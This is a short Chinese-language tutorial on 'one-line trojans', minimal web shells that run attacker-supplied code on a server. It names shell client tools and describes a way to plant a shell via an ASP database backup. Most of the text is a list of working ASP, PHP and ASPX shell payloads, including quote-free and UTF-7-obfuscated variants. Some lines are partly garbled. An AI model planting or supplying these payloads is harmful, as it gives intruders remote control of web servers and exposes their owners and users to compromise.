一句话木马的使用
一句话最常用的客户端
一句话客户端增强版 中国菜刀 lanker一句话客户端 ZV新型PHP一句话木马客户端GUI版
解释
首先<SCRIPT RUNAT=SERVER
LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标 记,其中RUNAT属性的值SERVER表示脚本将在服务器 端运行, 后面的eval是一句话木马的精华部分,使用eval 方法的话它里面的字符串将会被执行,这样当脚本在服 务器端运行的时候同时也执行了 Request.form('#')+'' 这句代码,Request.form('#')的作用是读取客户端文件 中html标记属性中name值被命名 为#的部分
两种使用方法
一、把一句话木马插入asp数据库里,然后用一句话g备份成asp,在利用一 句话木马客服端连接
其它形式的一句话木马
不用‘<,>’的asp一句话木马:
<script language=VBScript runat=server>execute request("value")</script> 不用双引号的一句话木马: <%eval request(chr(35))%> UTF-7编码加密: <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+je+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j)+j-%>
常见一句话木马
asp一句话木马:
<%execute(request("value"))%> <%eval request("value")%> php一句话木马: <?php eval($_POST[value]);?> aspx一句话木马: <script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); </script>